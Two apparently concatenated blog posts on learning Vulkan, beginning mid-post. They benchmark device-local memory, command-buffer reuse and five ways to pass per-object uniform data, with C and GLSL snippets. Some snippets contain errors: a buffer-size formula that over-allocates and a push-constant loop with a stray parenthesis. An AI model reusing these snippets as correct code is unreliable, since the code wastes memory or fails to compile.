<h2 id="use-device-local-memory">Use Device-Local Memory</h2>
<p>I liked this piece of feedback because it forced me to actually validate an assumption I made in the previous post: that data which gets 100% updated every frame likely doesn’t benefit from being device local. So I’m starting with that as my hypothesis.</p>
<p>For the most part, changing things to use device local memory was surprisingly easy. All it took was changing what buffer was getting mapped when I wanted to transfer uniform data, and then adding code to copy that data (now in a staging buffer) to the device local memory that the shaders ended up using. Given that the nuts and bolts of using a staging buffer are already excellently presented at <a href="https://vulkan-tutorial.com/Vertex_buffers/Staging_buffer">vulkan-tutorial.com</a>, I’m going to skip talking about that here. You can always check out the <a href="https://github.com/khalladay/VkBreakout">repo</a> if you’re curious.</p>
<p>I updated the performance graph from last week with timings using device local memory. I also included timings using vkTimestamps for the draw functions as well (again, only for the loop that created and submitted draw calls, since that’s what changed between different versions).</p>
<div align="center">
<img src="/images/post_images/2017-08-30/memorytype.PNG" />
<br /><br />
</div>
<div align="center">
<img src="/images/post_images/2017-08-30/timestamp2.PNG" />
<font size="2">In 3D to show the really small values too</font>
<br /><br />
</div>
<p>Turns out my hypothesis was wrong. Spectacularly wrong.</p>
<p>The huuuggeee increase in frametime for the multi-buffer versions took me off guard. It’s so high that I’m wondering if I’m not making another weird mistake in my implementation (please, spot my mistake in <a href="https://github.com/khalladay/VkBreakout/blob/02-Multi-Buffer-KeepMapped/Breakout/Renderer.cpp">the renderer.cpp file</a>), but I suppose it does make some sense, given that we’re asking the gpu to do 5000 copy buffer operations every frame in addition to everything else.</p>
<p>That being said, for the single buffer approach, using device-local memory pushed it’s average time per frame to the same speed as using push-constants, which is interesting, but I’m not sure I expect that to hold up given heavier loads (although I’m not sure which one would win in that case). Sounds like something to test in a later (more complex) project.</p>
<p>For now though, the message from this is test is clear: use device-local memory for data which doesn’t get updated frequently (or at least, which doesn’t require a lot of copy buffer operations per frame).</p>
<p>Last note - the two graphs were generated in different runs of testing, so the numbers don’t 100% add up between the two of them, but they’re close enough for me to feel comfortable drawing early conclusions about how to use Vulkan, so I’m not losing any sleep over it.</p>
<h2 id="re-use-command-buffers">Re-use Command Buffers</h2>
<p>The last bit of advice that I wanted to look into was that I am wasting time recreating command buffers that are mostly identical every frame. The only time the command buffer actually changes is when a brick gets removed. Since all the tests that I’m running involve a static scene anyway, I’m going to work around that here by just having logic move the hit bricks off-screen, instead of removing them. I definitely couldn’t get away with changes like this on a real project, but it works well enough to get some performance data in this case.</p>
<p>I made a few changes to the project so that the actual draw function doesn’t record any commands, it simply submits the pre-recorded command buffers that are generated at the beginning of the project. Unsurprisingly, this is pretty good for performance:</p>
<div align="center">
<img src="/images/post_images/2017-08-30/reuse1.PNG" />
<font size="2">You can't reuse a command buffer with push constants (as far as I know)</font>
<br /><br />
</div>
<p>From the graph, you can see how much this improves the performance of basically everything. In fact, compared to everything else that I tried, reusing command buffers was by far the single most impactful thing for the performance of the program. It literally made almost everything (except mapping a per object buffer every frame) faster than the push-constant approach, which so far has been the most performant way to do things in every test. I assume that even a less aggressive buffer re-use strategy would pay dividends in a more complex project, and I’m certainly going to be structuring future projects to take advantage of this as much as possible.</p>
<p>I also decided to test to see how these improvements fared when using device-local memory:</p>
<div align="center">
<img src="/images/post_images/2017-08-30/reuse2.png" />
<br /><br />
</div>
<p>Maybe anticlimactically (since this is my last graph), for the single buffer approaches this did basically nothing. For the multi-buffer approaches, the overhead of doing a vkCmdCopyBuffer for each object every frame still hit performance so hard that reusing the command buffers really didn’t matter. The lesson to gain from all this: pay attention to how often you update a chunk of data before deciding to make it device-local, since that could be doing more harm than good.</p>
<p>I would have taken vulkan timestamp measurements of all of this, but I realized after taking data down the first time that I had changed the first timestamp call to VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT to test something out earlier and had forgotten to change it back, making any timestamp data I got here completely useless for comparing against previous data, and I’m sick to death of this Breakout clone, so I decided to just press on and omit those measurements.</p>
<h2 id="conclusion">Conclusion</h2>
<p>That’s all for today! When I started making my little Breakout clone, I had no idea that it was going to turn out to be so informative! That being said, I need to move on now. There were some bits of advice that I got that I really liked, that I didn’t end up trying out here simply to save my sanity. This code was never written to be anything other than throwaway code, and it’s time to throw it all out and start fresh. Who knows, maybe my next foray into vulkan will even have textures!</p>
<p>If you spot any errors (there’s likely a ton) in the above code, or just want to say hi, I’m always around <a href="https://twitter.com/khalladay">on Twitter!</a>. I’ve learned more from people pointing out my mistakes in the past week than I did actually building this thing from scratch, so keep the feedback coming!</p>
<font size="2"><div style="border-style:solid; background-color:#DDDDDD ">
<strong>Appendix: Testing Methodology</strong><br />
In case reviewing testing methods is your thing, here's how I got the numbers in all the graphs in this post:<br /><br />
<li>When testing, the time step of the game logic was set to 0 (rather than deltaTime), so that any variations in frame rate from things like removing bricks, or handling game restart logic were eliminated. Then, the game was run for 20k frames, reporting the average frametime after every 5k frames. This gave me 4 average frame time numbers. I discarded the highest and lowest of these numbers, and then averaged the two remaining values to produce an average frametime for the test.</li><br />
<li>I monitored my CPU and GPU temp with the <a href="https://camwebapp.com/">Cam Web App</a>, and let both of them return to their resting temp between tests (61 and 66 C respectively), and made sure that the same applications (and only those applications) were running alongside the breakout program.</li><br />
<li>I repeated this test 2 more times, at different times of the day (after using the laptop to do other tasks), which gave me 3 frametime averages (1 per run of the test). I chose the median of the three to present in the graph above.</li><br />
<li>Unless vkCmdWriteTimestamp data was included in the graph, the calls to vkCmdWriteTimestamp were removed via an ifdef</li><br />
<li>Finally, all tests were done in Release builds, without a debugger attached or any validation layers turned on, and connected to a wall outlet to prevent any kind of throttling on battery to interfere with anything.</li><br />
<li>All the source for everything is <a href="https://github.com/khalladay/VkBreakout">on github</a>, I would love for someone to compile everything and run a similar test to see if the results for my GPU can be replicated on someone else's hardware.</li>
</div>
</font>
Comparing Uniform Data Transfer Methods in Vulkan2017-08-13T00:00:00+00:00http://kylehalladay.com/blog/tutorial/vulkan/2017/08/13/Vulkan-Uniform-Buffers<p>Lately I’ve been trying to wrap my head around Vulkan. As part of that, I’ve been building a small Breakout clone (<a href="https://github.com/khalladay/VkBreakout">github</a>) as a way to see how the pieces of the API fit together in a “real” application.</p>
<p>When I’m starting to learn a new graphics API, the thing that I try to focus on is getting used to all the different ways to send data from the CPU to the GPU. Since my Breakout clone didn’t have textures, or meshes (really) to speak of, that left the per frame uniform data for each object on screen.</p>
<div align="center">
<img src="/images/post_images/2017-08-13/breakout.png" />
<font size="2">The "Playable" version of the Breakout Clone</font>
<br /><br />
</div>
<p>Looking at a few vulkan examples I could find, and taking a quick glance through the API, I settled on 5 different options for getting my uniform data sent to the card:</p>
<ul>
<li>Using push-constants</li>
<li>Using 1 VkBuffer and keeping it mapped all the time</li>
<li>Using 1 VkBuffer and mapping/unmapping per frame</li>
<li>Using multiple VkBuffers, and keeping them all mapped</li>
<li>Using multiple VkBuffers, and mapping/unmapping every frame
<br /><br /></li>
</ul>
<p>All the guidelines out there are pretty clear when they say to use push-constants for data that has to change on a per-object basis every frame, but given that push constants have a size limit, it made sense to give each of the above approaches a whirl, since they conceivably all will have their place in a large application.</p>
<p>So, in the interest of whirling, I put a branch in my repo for each, and then tracked the average frame-time of each to see how much faster or slower each approach was.</p>
<p>However, Breakout is really not a good test for a GTX 1060, and with 500 blocks on screen, I was running every test at < 1 ms per frame. The times were so small, that even between runs of the exact same version of the program, the results were too varied to be much use (since even a change in measured time of 1/100th of an ms became significant). To make things a bit easier to work with, I added a mode to the game which rendered 5000 blocks at a time.</p>
<div align="center">
<img src="/images/post_images/2017-08-13/stresstest.PNG" />
<font size="2">which admittedly looked sorta ridiculous</font>
<br /><br />
</div>
<p>This produced much more stable results (ie/ could be reproduced in multiple runs), which I want to provide here to give context to the rest of this blog post.</p>
<div align="center">
<img src="/images/post_images/2017-08-13/vktest.PNG" />
<br />
</div>
<p>The big takeaway here is that mapping memory is a really slow process, so if you need something mapped, keep it that way for as long as you can. This is likely not news to anyone except me, since I’ve been living in mobile engine land for my whole career and really haven’t had to worry about that. Oh, and the guides were right, you should totally use push constants when you can. If you can’t use them, there’s a slight advantage to packing multiple objects worth of data into a single buffer, vs giving every object it’s own.</p>
<p>With that in mind, I want to walk through the implementation details of each approach, because I wish something like that had existed before I started down this rabbit hole. If you were only interested in the performance results, you can stop reading and go about your life :) If you’re scratching your head as to how to do one or more of these things, join me below!</p>
<h2 id="preliminary-info">Preliminary info</h2>
<p>In order to make much sense of the code I’m going to share, it will be helpful to understand that my code stores uniform data that will be sent to the GPU in a struct called PrimitiveUniformObject, which directly maps to the layout of the uniform data in the shader:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//CPU</span>
<span class="k">struct</span> <span class="n">PrimitiveUniformObject</span>
<span class="p">{</span>
<span class="n">glm</span><span class="o">::</span><span class="n">mat4</span> <span class="n">model</span><span class="p">;</span>
<span class="n">glm</span><span class="o">::</span><span class="n">vec4</span> <span class="n">color</span><span class="p">;</span>
<span class="p">};</span>
<span class="c1">//glsl</span>
<span class="n">layout</span><span class="p">(</span><span class="n">set</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">binding</span> <span class="o">=</span> <span class="mi">0</span><span class="p">)</span> <span class="n">uniform</span> <span class="n">PER_OBJECT</span>
<span class="p">{</span>
<span class="n">mat4</span> <span class="n">mvp</span><span class="p">;</span>
<span class="n">vec4</span> <span class="n">col</span><span class="p">;</span>
<span class="p">}</span> <span class="n">obj</span><span class="p">;</span></code></pre></figure>
<p>Hopefully that makes sense! I’m going to try to keep all the snippets I share abbreviated enough that you otherwise don’t need to care about how I structured things, but I couldn’t get around telling you about this tiny bit.</p>
<p>I’m also going to assume that you’re at least at the level I was when I started this project, that is, you’ve gone through <a href="https://vulkan-tutorial.com/">vulkan-tutorial.com</a>, and therefore understand how to allocate a VkBuffer. If you aren’t there yet, click the link to the tutorial and come back in a few hours. Things will make much more sense.</p>
<h2 id="multiple-unmapped-buffers">Multiple, Unmapped Buffers</h2>
<p>Let’s start by talking about the approaches that felt most intuitive for me right off the bat, giving each drawable entity (which my code calls a Primitive) it’s own VkBuffer to store it’s own uniform data, and a VkDescriptorSet to know about that buffer:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">PrimitiveInstance</span>
<span class="p">{</span>
<span class="n">vec3</span> <span class="n">pos</span><span class="p">;</span>
<span class="n">vec3</span> <span class="n">scale</span><span class="p">;</span>
<span class="n">vec4</span> <span class="n">col</span><span class="p">;</span>
<span class="n">VkBuffer</span> <span class="n">uniformBuffer</span><span class="p">;</span>
<span class="n">VkDescriptorSet</span> <span class="n">descSet</span><span class="p">;</span>
<span class="n">VkDeviceMemory</span> <span class="n">bufferMem</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">meshID</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>My project was simple enough (and my gpu forgiving enough) that I could get away with doing a VkDeviceMemory allocation for every primitive. On a larger project you’d have to do something smarter than that.</p>
<p>Since the entirety of the data stored in the VkBuffer is going to get updated every frame, and we’re going to update the data with a single write to the buffer data, I allocated the VkBuffers with host coherent memory, which makes things nice and easy when it’s time to update the data:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//abbreviated code:</span>
<span class="n">PrimitiveUniformObject</span> <span class="n">puo</span><span class="p">;</span>
<span class="n">puo</span><span class="p">.</span><span class="n">model</span> <span class="o">=</span> <span class="n">VIEW_PROJECTION</span> <span class="o">*</span> <span class="p">(</span><span class="n">glm</span><span class="o">::</span><span class="n">translate</span><span class="p">(</span><span class="n">pos</span><span class="p">)</span> <span class="o">*</span> <span class="n">glm</span><span class="o">::</span><span class="n">scale</span><span class="p">(</span><span class="n">scale</span><span class="p">));</span>
<span class="n">puo</span><span class="p">.</span><span class="n">color</span> <span class="o">=</span> <span class="n">col</span><span class="p">;</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">udata</span> <span class="o">=</span> <span class="n">nullptr</span><span class="p">;</span>
<span class="n">vkMapMemory</span><span class="p">(</span><span class="n">device</span><span class="p">,</span> <span class="n">bufferMem</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="p">),</span> <span class="mi">0</span><span class="p">,</span> <span class="o">&</span><span class="n">udata</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">udata</span><span class="p">,</span> <span class="o">&</span><span class="n">puo</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="p">));</span>
<span class="n">vkUnmapMemory</span><span class="p">(</span><span class="n">device</span><span class="p">,</span> <span class="n">bufferMem</span><span class="p">);</span></code></pre></figure>
<p>Since we’ve already taken a look at the performance graph, we know that mapping/unmapping the buffer for each Primitive, every frame, is a performance killer. We can work around that with the next approach and get much better results.</p>
<h2 id="multiple-always-mapped-buffers">Multiple, Always Mapped Buffers</h2>
<p>To make the multiple buffer approach faster, all we need to do is to add one more variable to the PrimitiveInstance struct:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">PrimitiveInstance</span>
<span class="p">{</span>
<span class="n">vec3</span> <span class="n">pos</span><span class="p">;</span>
<span class="n">vec3</span> <span class="n">scale</span><span class="p">;</span>
<span class="n">vec4</span> <span class="n">col</span><span class="p">;</span>
<span class="n">VkBuffer</span> <span class="n">uniformBuffer</span><span class="p">;</span>
<span class="n">VkDescriptorSet</span> <span class="n">descSet</span><span class="p">;</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">mapped</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">meshID</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>In this approach, when a primitive was created, the data for their buffer was immediately mapped, and the address stored in the mapped pointer above. Note that the PrimitiveInstance struct doesn’t contain a PrimitiveUniformObject, those get created per frame by combining the easier to work with variables we have here.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//abbreviated code:</span>
<span class="n">PrimitiveUniformObject</span> <span class="n">puo</span><span class="p">;</span>
<span class="n">puo</span><span class="p">.</span><span class="n">model</span> <span class="o">=</span> <span class="n">VIEW_PROJECTION</span> <span class="o">*</span> <span class="p">(</span><span class="n">glm</span><span class="o">::</span><span class="n">translate</span><span class="p">(</span><span class="n">pos</span><span class="p">)</span> <span class="o">*</span> <span class="n">glm</span><span class="o">::</span><span class="n">scale</span><span class="p">(</span><span class="n">scale</span><span class="p">));</span>
<span class="n">puo</span><span class="p">.</span><span class="n">color</span> <span class="o">=</span> <span class="n">col</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">mapped</span><span class="p">,</span> <span class="o">&</span><span class="n">puo</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="p">));</span></code></pre></figure>
<p>Then, all that’s needed is to submit each object’s descriptorSet to the rendering function, and pass the right one to vkCmdBindDescriptorSets at the right time. As you saw in the graph earlier, this approach was the slowest of the three approaches that didn’t involve mapping/unmapping data every frame.</p>
<p>In the above code, I don’t need to call vkflushmappedmemoryranges or similar because the buffer memory was allocated with the VK_MEMORY_PROPERTY_HOST_COHERENT_BIT flag set. Without that, you’d have to manually tell vulkan when you changed the data at that pointer. Host coherent memory is very likely slower than not the alternative, but for buffers which are completely changed every frame, I’m not sure there’s much of a difference.</p>
<p>I haven’t tested out anything using non-host coherent memory though, so I reserve the right to be totally wrong about that.</p>
<h2 id="single-dynamic-uniform-buffer">Single Dynamic Uniform Buffer</h2>
<p>The second approach I tried was to allocate a single VkBuffer which was large enough to store the uniform data for every object inside it, treating the buffer’s contents as an array of uniform data. Since in my case, I was submitting an array of mesh ids alongside the uniform data, this meant that I didn’t need to store any extra info in the primitive instance struct. As long as both arrays were in the same order, the right mesh would get drawn with the right uniform data.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">PrimitiveInstance</span>
<span class="p">{</span>
<span class="n">vec3</span> <span class="n">pos</span><span class="p">;</span>
<span class="n">vec3</span> <span class="n">scale</span><span class="p">;</span>
<span class="n">vec4</span> <span class="n">col</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">meshID</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>One caveat to this approach is that the data stored in the VkBuffer has to be memory aligned to your GPU. In my case, I was already getting my VkPhysicalDeviceProperties when I initialized everything, so that data was easily accessible. With that alignment data, you can then figure out exactly how big your VkBuffer has to be:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">size_t</span> <span class="n">deviceAlignment</span> <span class="o">=</span> <span class="n">deviceProps</span><span class="p">.</span><span class="n">limits</span><span class="p">.</span><span class="n">minUniformBufferOffsetAlignment</span><span class="p">;</span>
<span class="kt">size_t</span> <span class="n">uniformBufferSize</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="p">);</span>
<span class="kt">size_t</span> <span class="n">dynamicAlignment</span> <span class="o">=</span> <span class="p">(</span><span class="n">uniformBufferSize</span> <span class="o">/</span> <span class="n">deviceAlignment</span><span class="p">)</span> <span class="o">*</span> <span class="n">deviceAlignment</span> <span class="o">+</span> <span class="p">((</span><span class="n">uniformBufferSize</span> <span class="o">%</span> <span class="n">deviceAlignment</span><span class="p">)</span> <span class="o">></span> <span class="mi">0</span> <span class="o">?</span> <span class="n">deviceAlignment</span> <span class="o">:</span> <span class="mi">0</span><span class="p">);</span>
<span class="kt">size_t</span> <span class="n">bufferSize</span> <span class="o">=</span> <span class="n">uniformBufferSize</span> <span class="o">*</span> <span class="n">primitiveCount</span> <span class="o">*</span> <span class="n">dynamicAlignment</span><span class="p">;</span></code></pre></figure>
<p>Once you know the alignment you need, you can use Windows’ aligned_malloc function to actually get an aligned block of memory, which you can then memcpy into the vkbuffer’s mapped pointer.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">uniformData</span> <span class="o">=</span> <span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="o">*</span><span class="p">)</span><span class="n">_aligned_malloc</span><span class="p">(</span><span class="n">bufferSize</span><span class="p">,</span> <span class="n">dynamicAlignment</span><span class="p">);</span></code></pre></figure>
<p>Since the PrimitiveUniformObject struct itself has no notion of alignment, you have to space your writes into buffer memory accordingly:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//abbreviated code</span>
<span class="kt">int</span> <span class="n">idx</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">uniformChar</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">uniformData</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="k">const</span> <span class="k">auto</span><span class="o">&</span> <span class="n">prim</span> <span class="o">:</span> <span class="n">primitives</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">PrimitiveUniformObject</span> <span class="n">puo</span><span class="p">;</span>
<span class="n">puo</span><span class="p">.</span><span class="n">model</span> <span class="o">=</span> <span class="n">VIEW_PROJECTION</span> <span class="o">*</span> <span class="p">(</span><span class="n">glm</span><span class="o">::</span><span class="n">translate</span><span class="p">(</span><span class="n">prim</span><span class="p">.</span><span class="n">pos</span><span class="p">)</span> <span class="o">*</span> <span class="n">glm</span><span class="o">::</span><span class="n">scale</span><span class="p">(</span><span class="n">prim</span><span class="p">.</span><span class="n">scale</span><span class="p">));</span>
<span class="n">puo</span><span class="p">.</span><span class="n">color</span> <span class="o">=</span> <span class="n">prim</span><span class="p">.</span><span class="n">col</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">uniformChar</span><span class="p">[</span><span class="n">idx</span> <span class="o">*</span> <span class="n">dynamicAlignment</span><span class="p">],</span> <span class="o">&</span><span class="n">puo</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="p">));</span>
<span class="n">idx</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Likewise, when you allocate your VkBuffer, you’re going to want to request a buffer of size dynamicAlignment * number of primitives, and you’ll want to make sure you get memory that comes from a descriptorPool of type VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER_DYNAMIC.</p>
<p>With all of that set up, you can then copy your frame data to the uniform buffer like so:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span><span class="o">*</span> <span class="n">udata</span> <span class="o">=</span> <span class="n">nullptr</span><span class="p">;</span>
<span class="n">vkMapMemory</span><span class="p">(</span><span class="n">device</span><span class="p">,</span> <span class="n">buffer</span><span class="p">.</span><span class="n">deviceMemory</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">dynamicAlignment</span> <span class="o">*</span> <span class="n">PRIM_COUNT</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="o">&</span><span class="n">udata</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">udata</span><span class="p">,</span> <span class="n">uniformData</span><span class="p">,</span> <span class="n">dynamicAlignment</span> <span class="o">*</span> <span class="n">PRIM_COUNT</span><span class="p">);</span>
<span class="n">vkUnmapMemory</span><span class="p">(</span><span class="n">device</span><span class="p">,</span> <span class="n">buffer</span><span class="p">.</span><span class="n">deviceMemory</span><span class="p">);</span></code></pre></figure>
<p>And finally, you need to pass an offset in your calls to vkCmdBindDescriptorSets. This offset tells vulkan where in the single buffer’s data to grab each object’s individual uniform data. Since it’s a byte offset, you’ll need to have the dynamicAlignment value we calculated earlier handy:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">PRIM_COUNT</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">dynamicOffset</span> <span class="o">=</span> <span class="n">i</span> <span class="o">*</span> <span class="n">static_cast</span><span class="o"><</span><span class="kt">uint32_t</span><span class="o">></span><span class="p">(</span><span class="n">dynamicAlignment</span><span class="p">);</span>
<span class="n">vkCmdBindDescriptorSets</span><span class="p">(</span><span class="n">commandBuffer</span><span class="p">,</span>
<span class="n">VK_PIPELINE_BIND_POINT_GRAPHICS</span><span class="p">,</span>
<span class="n">pipelineLayout</span><span class="p">,</span>
<span class="mi">0</span><span class="p">,</span>
<span class="mi">1</span><span class="p">,</span>
<span class="o">&</span><span class="n">descriptorSet</span><span class="p">,</span>
<span class="mi">1</span><span class="p">,</span>
<span class="o">&</span><span class="n">dynamicOffset</span><span class="p">);</span>
<span class="c1">// rest of per object draw code goes here</span>
<span class="p">}</span></code></pre></figure>
<p>That should be enough to get you going, but we can make this faster too.</p>
<h2 id="always-mapped-single-buffer">Always Mapped Single Buffer</h2>
<p>Just like the multi-buffer approach, we can speed up the single buffer solution by keeping that buffer always mapped. Since we only have one buffer, this is a trivial change to the code. If you wanted, you could even just do it inside your update function like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">static</span> <span class="kt">void</span><span class="o">*</span> <span class="n">udata</span> <span class="o">=</span> <span class="n">nullptr</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">udata</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vkMapMemory</span><span class="p">(</span><span class="n">device</span><span class="p">,</span> <span class="n">buffer</span><span class="p">.</span><span class="n">deviceMemory</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">dynamicAlignment</span> <span class="o">*</span> <span class="n">PRIM_COUNT</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="o">&</span><span class="n">udata</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">udata</span><span class="p">,</span> <span class="n">uniformData</span><span class="p">,</span> <span class="n">dynamicAlignment</span> <span class="o">*</span> <span class="n">PRIM_COUNT</span><span class="p">);</span></code></pre></figure>
<p>Of course, you probably shouldn’t do it like this, but there’s no performance reason not to, so I’m going to back away slowly from discussing code quality issues now.</p>
<h2 id="push-constants">Push Constants</h2>
<p>To finish things off, let’s take a look at our big winner from the performance tests. Push constants are great for data that updates this frequently because you don’t actually need to allocate any buffers for it. This also means that we need to do a few things differently from the previous 4 approaches we’ve looked at, like changing how we declare our uniform data struct in glsl:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">layout</span><span class="p">(</span><span class="n">push_constant</span><span class="p">)</span> <span class="n">uniform</span> <span class="n">PER_OBJECT</span>
<span class="p">{</span>
<span class="n">mat4</span> <span class="n">mvp</span><span class="p">;</span>
<span class="n">vec4</span> <span class="n">col</span><span class="p">;</span>
<span class="p">}</span> <span class="n">obj</span><span class="p">;</span></code></pre></figure>
<p>Next, instead of creating any VkBuffers, when we create our pipeline layout, we need to specify a push constant range:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">VkPushConstantRange</span> <span class="n">pushConstantRange</span> <span class="o">=</span> <span class="p">{};</span>
<span class="n">pushConstantRange</span><span class="p">.</span><span class="n">offset</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">pushConstantRange</span><span class="p">.</span><span class="n">size</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="p">);</span>
<span class="n">pushConstantRange</span><span class="p">.</span><span class="n">stageFlags</span> <span class="o">=</span> <span class="n">VK_SHADER_STAGE_VERTEX_BIT</span><span class="p">;</span>
<span class="n">VkPipelineLayoutCreateInfo</span> <span class="n">pipelineLayoutInfo</span> <span class="o">=</span> <span class="p">{};</span>
<span class="c1">//..other init code here</span>
<span class="n">pipelineLayoutInfo</span><span class="p">.</span><span class="n">pSetLayouts</span> <span class="o">=</span> <span class="o">&</span><span class="n">descriptorSetLayout</span><span class="p">;</span> <span class="c1">// still need this</span>
<span class="n">pipelineLayoutInfo</span><span class="p">.</span><span class="n">pushConstantRangeCount</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="n">pipelineLayoutInfo</span><span class="p">.</span><span class="n">pPushConstantRanges</span> <span class="o">=</span> <span class="o">&</span><span class="n">pushConstantRange</span><span class="p">;</span></code></pre></figure>
<p>Like the comment above says, even when using push constants, you still need to provide a descriptorSetLayout to specify how the uniform data is going to be laid out in memory. You just don’t actually need to make any descriptorSets to actually pass that data to the shader.</p>
<p>Instead, where you might otherwise call vkCmdBindDescriptorSets, you do the following:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">PRIM_COUNT</span><span class="p">);</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vkCmdPushConstants</span><span class="p">(</span>
<span class="n">commandBuffer</span><span class="p">,</span>
<span class="n">pipelineLayout</span><span class="p">,</span>
<span class="n">VK_SHADER_STAGE_VERTEX_BIT</span><span class="p">,</span>
<span class="mi">0</span><span class="p">,</span>
<span class="k">sizeof</span><span class="p">(</span><span class="n">PrimitiveUniformObject</span><span class="p">),</span>
<span class="o">&</span><span class="n">uniformData</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
<span class="c1">// rest of per object draw code goes here</span>
<span class="p">}</span></code></pre></figure>
<p>That should cover it (assuming I haven’t missed a step). Given the option, push constants feel a lot cleaner for passing small bits of data to shaders, which makes sense given that they’re tailor made for that purpose. It is nice to have the most performant option we have, also be the easiest to work with.</p>
<h2 id="conclusion">Conclusion</h2>
<p>That wraps up the implementation details for everything. To get a sense of when to use each approach, I recommend you check out NVidia’s <a href="https://developer.nvidia.com/vulkan-shader-resource-binding">Vulkan Shader Resource Binding</a> page.</p>
<p>I’m a complete beginner with Vulkan, so if you see anything weird or just plain wrong in this post, please send me a message <a href="https://twitter.com/khalladay">on Twitter</a>, I would love to hear from you! Likewise, if there’s a resource out there that’s helped you get a handle on Vulkan, please pass it along.</p>
<p>Until next time!
<br /><br /></p>
<font size="2"><div style="border-style:solid; background-color:#DDDDDD ">
<strong>Appendix: Testing Methodology</strong><br />
In case reviewing testing methods is your thing, here's how I got the numbers in all the graphs in this post:<br /><br />
<li>When testing, the time step of the game logic was set to 0 (rather than deltaTime), so that any variations in frame rate from things like removing bricks, or handling game restart logic were eliminated. Then, the game was run for 20k frames, reporting the average frametime after every 5k frames. This gave me 4 average frame time numbers. I discarded the highest and lowest of these numbers, and then averaged the two remaining values to produce an average frametime for the test.</li><br />
<li>I monitored my CPU and GPU temp with the <a href="https://camwebapp.com/">Cam Web App</a>, and let both of them return to their resting temp between tests (61 and 66 C respectively), and made sure that the same applications (and only those applications) were running alongside the breakout program.</li><br />
<li>I repeated this test 2 more times, at different times of the day (after using the laptop to do other tasks), which gave me 3 frametime averages (1 per run of the test). I chose the median of the three to present in the graph above.</li><br />
<li>Finally, all tests were done in Release builds, without a debugger attached or any validation layers turned on, and connected to a wall outlet to prevent any kind of throttling on battery to interfere with anything.</li><br />
<li>All the source for everything is <a href="https://github.com/khalladay/VkBreakout">on github</a>, I would love for someone to compile everything and run a similar test to see if the results for my GPU can be replicated on someone else's hardware.</li>
</div>
</font>
